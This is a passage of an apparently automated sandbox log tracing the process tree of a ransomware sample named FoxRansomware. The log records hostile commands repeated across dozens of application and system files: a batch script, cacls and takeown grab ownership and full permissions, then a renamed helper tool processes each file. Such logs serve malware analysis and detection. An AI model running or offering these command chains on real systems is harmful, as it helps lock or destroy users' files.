    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "PurblePlaceMCE.png" -nobanner
    3⤵
    PID:2480
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "PurblePlaceMCE.png" -nobanner
      4⤵
      PID:2032
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""
  2⤵
  PID:3784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:2544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SolitaireMCE.png" -nobanner
    3⤵
    PID:3756
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "SolitaireMCE.png" -nobanner
      4⤵
      PID:3976
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""
  2⤵
  PID:3092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:4068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
    3⤵
    PID:3368
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
      4⤵
      PID:1976
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
  2⤵
  PID:3788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
    3⤵
    PID:3992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "FreeCellMCE.png" -nobanner
    3⤵
    PID:1884
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "FreeCellMCE.png" -nobanner
      4⤵
      PID:996
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3172
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
  2⤵
  PID:2636
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
    3⤵
    PID:1536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "HeartsMCE.png" -nobanner
    3⤵
    PID:2836
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "HeartsMCE.png" -nobanner
      4⤵
      PID:1960
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:1132
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    - Modifies file permissions
    PID:3580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:1692
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:1772
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2496
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  2⤵
  PID:3892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2076
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3844
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2792
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""
  2⤵
  PID:2324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C
    3⤵
    PID:3936
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"
    3⤵
    PID:3912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "license.html" -nobanner
    3⤵
    PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "license.html" -nobanner
      4⤵
      PID:3920
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  2⤵
  PID:224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2632
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1588
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  2⤵
  PID:228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1308
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    3⤵
    PID:3472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3676
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3352
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
  2⤵
  PID:2732
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
    3⤵
    PID:3900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
    3⤵
    - Modifies file permissions
    PID:2176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "eula.ini" -nobanner
    3⤵
    PID:2356
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "eula.ini" -nobanner
      4⤵
      PID:2192
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""
  2⤵
  PID:3928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C
    3⤵
    PID:324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
    3⤵
    PID:3888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AcroSign.prc" -nobanner
    3⤵
    PID:4180
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "AcroSign.prc" -nobanner
      4⤵
      PID:2280
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3256
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
  2⤵
  PID:2800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "forms_distributed.gif" -nobanner
    3⤵
    PID:1196
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "forms_distributed.gif" -nobanner
      4⤵
      PID:4072
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2448
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""
  2⤵
  PID:2348
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C
    3⤵
    PID:3212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"
    3⤵
    PID:4156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "reviews_sent.gif" -nobanner
    3⤵
    PID:3104
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "reviews_sent.gif" -nobanner
      4⤵
      PID:3112
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C
    3⤵
    PID:3364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"
    3⤵
    - Modifies file permissions
    PID:4140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "stop_collection_data.gif" -nobanner
    3⤵
    PID:4104
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "stop_collection_data.gif" -nobanner
      4⤵
      PID:4116
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"
    3⤵
    PID:4136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ReadMe.htm" -nobanner
    3⤵
    PID:1584
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "ReadMe.htm" -nobanner
      4⤵
      PID:4144
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""
  2⤵
  PID:3864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:2972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MinionPro-It.otf" -nobanner
    3⤵
    PID:2664
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "MinionPro-It.otf" -nobanner
      4⤵
      PID:2232
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3768
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""
  2⤵
  PID:4152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C
    3⤵
    PID:3804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"
    3⤵
    - Modifies file permissions
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ZX______.PFB" -nobanner
    3⤵
    PID:3376
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "ZX______.PFB" -nobanner
      4⤵
      PID:3388
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""
  2⤵
  PID:2432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C
    3⤵
    PID:2180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"
    3⤵
    - Modifies file permissions
    PID:2764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt04.hsp" -nobanner
    3⤵
    PID:3596
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "brt04.hsp" -nobanner
      4⤵
      PID:3264
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""
  2⤵
  PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C
    3⤵
    PID:3632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"
    3⤵
    PID:3000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "engphon.env" -nobanner
    3⤵
    PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "engphon.env" -nobanner
      4⤵
      PID:3420
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2128
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""
  2⤵
  PID:3616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CORPCHAR.TXT" -nobanner
    3⤵
    PID:3288
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "CORPCHAR.TXT" -nobanner
      4⤵
      PID:1988
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"
    3⤵
    - Modifies file permissions
    PID:2628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1250.TXT" -nobanner
    3⤵
    PID:1632
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "CP1250.TXT" -nobanner
      4⤵
      PID:3320
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  2⤵
  PID:3136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
    3⤵
    PID:4212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "directories.acrodata" -nobanner
    3⤵
    PID:4224
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "directories.acrodata" -nobanner
      4⤵
      PID:3164
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  2⤵
  PID:2712
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    3⤵
    PID:4284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:4300
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:4328
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  2⤵
  PID:1784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
    3⤵
    PID:4384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
    3⤵
    PID:4380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "add_reviewer.gif" -nobanner
    3⤵
    PID:4376
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "add_reviewer.gif" -nobanner
      4⤵
      PID:4388
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4396
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""
  2⤵
  PID:4448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C
    3⤵
    PID:4404
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "forms_received.gif" -nobanner
    3⤵
    PID:4360
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "forms_received.gif" -nobanner
      4⤵
      PID:4520
